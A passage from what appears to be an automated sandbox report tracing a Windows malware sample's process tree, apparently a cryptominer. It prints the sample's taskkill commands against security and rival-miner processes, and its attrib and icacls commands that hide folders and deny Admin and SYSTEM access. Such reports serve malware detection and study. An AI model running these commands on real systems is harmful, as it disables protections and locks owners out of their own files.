                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:712
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          TASKKILL /IM securedisk.exe /T /F
                                                                                                                                                          4⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:876
                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                          timeout 1
                                                                                                                                                          4⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:3704
                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                          ATTRIB +H +S C:\disk
                                                                                                                                                          4⤵
                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                          PID:3212
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\disk" /deny Admin:(OI)(CI)(F)
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2800
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            TASKKILL /IM systemprocess.exe /T /F
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3368
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout 1
                                                                                                                                                            4⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:4852
                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                            ATTRIB +H +S C:\users\Admin\appdata\roaming\systemprocess
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3800
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "C:\users\Admin\appdata\roaming\systemprocess" /deny Admin:(OI)(CI)(F)
                                                                                                                                                              4⤵
                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:436
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              TASKKILL /IM defender.exe /T /F
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1608
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout 1
                                                                                                                                                              4⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:1908
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "C:\users\Admin\AppData\roaming\microsoft\windows defender" /deny Admin:(OI)(CI)(F)
                                                                                                                                                              4⤵
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:3488
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              TASKKILL /IM debugger.exe /T /F
                                                                                                                                                              4⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3356
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              TASKKILL /IM hostdl.exe /T /F
                                                                                                                                                              4⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5568
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout 1
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:5180
                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                              ATTRIB +H +S "C:\users\Admin\appdata\roaming\microsoft\network"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3784
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls "C:\users\Admin\appdata\roaming\microsoft\network" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5492
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  TASKKILL /IM gplyra.exe /T /F
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:1668
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout 1
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:3412
                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                  ATTRIB +H +S "C:\users\Admin\appdata\roaming\gplyra"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5456
                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                    icacls "C:\users\Admin\appdata\roaming\gplyra" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:5400
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    TASKKILL /IM run.exe /T /F
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:5416
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    ATTRIB +H +S "C:\programdata\tiser"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1688
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\programdata\tiser" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:5320
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      TASKKILL /IM nettrans.exe /T /F
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:760
                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                      ATTRIB +H +S "C:\programdata\prefssecure"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                      PID:3228
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\programdata\prefssecure" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3124
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      TASKKILL /IM net.exe /T /F
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4352
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      TASKKILL /IM net1.exe /T /F
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4284
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout 1
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:4740
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      TASKKILL /IM SYSTEM.exe /T /F
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4840
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout 1
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:2784
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\users\Admin\appdata\roaming\windowshelper" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1984
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\users\Admin\appdata\roaming\intel" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:4576
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        TASKKILL /IM hostdl.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4092
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\users\Admin\appdata\roaming\app" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:4432
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        TASKKILL /IM nscpucnminer.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4420
                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                        ATTRIB +H +S "c:\windows\min"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:5168
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls C:\windows\min\ /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:2264
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /IM ErrorCheck.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4860
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls C:\users\Admin\AppData\Roaming\Mikile /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3192
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /IM booster.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4928
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /IM unityp.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:3728
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /IM booster.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:1164
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        TASKKILL /IM hoststore.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:5376
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        TASKKILL /IM windowsdeffenders.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:2664
                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                        ATTRIB +H +S C:\windows\hs_moduler
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3492
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\windows\hs_module" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:4312
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        TASKKILL /IM dvjyy.exe /T /F
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4620
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          TASKKILL /IM hostsys.exe /T /F
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5552
                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                          ATTRIB +H +S C:\programdata\oracle
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                          PID:5468
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\programdata\oracle" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                          PID:6096
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /IM booster.exe /T /F
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5052
                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                          ATTRIB +H +S C:\users\Admin\AppData\Local\PCBooster
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:5912
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls C:\users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:3812
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            TASKKILL /IM nheqminer.exe /T /F
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4424
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /IM msminer.exe /T /F
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2324
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls C:\users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                PID:3944
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill /IM winlog.exe /T /F
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3868
                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                  ATTRIB +H +S C:\users\Admin\AppData\Roaming\systemcare
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:2448
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls C:\users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:808
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  TASKKILL /IM "Windows System Driver.exe" /T /F
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:2504
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  TASKKILL /IM "Windows Driver.exe" /T /F
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:4980
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  TASKKILL /IM "COM Surrogate.exe" /T /F
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5564
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    TASKKILL /IM "system.exe" /T /F
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1272
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      TASKKILL /IM "security.exe" /T /F
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:4120
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:1868
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:2756
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\programdata\WindowsSQL /deny system:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        PID:1912
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:5968
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\programdata\DirectX11b /deny system:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:3308
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\programdata\Framework /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:2236
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\programdata\Framework /deny system:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:864
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        TASKKILL /IM AMD.exe /T /F
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:4108
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\users\Admin\AppData\local\AMD /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        PID:5192
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls C:\users\Admin\AppData\local\AMD /deny system:(OI)(CI)(F
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:744
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          TASKKILL /IM nssm.exe /T /F
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:4784
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          TASKKILL /IM xmarin.exe /T /F
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:4080
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls C:\users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:2260
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          TASKKILL /IM wupdate.exe /T /F
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5588
                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                            ATTRIB +H +S C:\users\Admin\AppData\Local\wupdate
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4588
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls C:\users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:5300
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              TASKKILL /IM SIVapp.exe /T /F
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5512
                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                ATTRIB +H +S C:\users\Admin\AppData\Local\SIVapp
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                PID:5824
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls C:\users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:5172
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                TASKKILL /IM Kyubey.exe /T /F
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:5084
                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                ATTRIB +H +S C:\users\Admin\AppData\Roaming\kyubey
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                PID:2884
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls C:\users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                PID:1576
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                TASKKILL /IM mel.exe /T /F
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:4360
                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                ATTRIB +H +S C:\users\Admin\AppData\Roaming\QIPapp
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:1408
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls C:\users\Admin\AppData\Roaming\QIPapp /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:1460
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                TASKKILL /IM NSCPUCNMINER64.EXE /T /F
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:5684
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                TASKKILL /IM img002.EXE /T /F
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:3252
                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                ATTRIB +H +S C:\users\Admin\AppData\Roaming\NSCPUCNMINER
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                PID:1028
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls C:\users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:5424
                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                  TASKKILL /IM monotype.exe /T /F
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:4972
                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                  ATTRIB +H +S C:\users\Admin\AppData\local\monotype
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                  PID:1664
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls C:\users\Admin\AppData\local\monotype /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5396
                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                    TASKKILL /IM xpon.exe /T /F
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2964
                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                      ATTRIB +H +S C:\users\Admin\AppData\local\xpon
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls C:\users\Admin\AppData\local\xpon /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:5296
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls C:\users\Admin\AppData\local\xpon /deny system:(OI)(CI)(F)
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:5976
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        TASKKILL /IM xmrig.exe /T /F
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5020
                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                          ATTRIB +H +S C:\users\Admin\AppData\Roaming\isminer
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                          PID:1660
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls C:\users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                          PID:4660
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          TASKKILL /IM security.exe /T /F
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:4088
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          TASKKILL /IM comdev.exe /T /F
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:3080
                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                          ATTRIB +H +S C:\users\Admin\AppData\Local\comdev
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                          PID:2232
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls C:\users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                          PID:2160
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          TASKKILL /IM wmipr.exe /T /F
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:3608
                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                          ATTRIB +H +S C:\users\Admin\AppData\Local\wmipr
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4756
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls C:\users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:3780
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
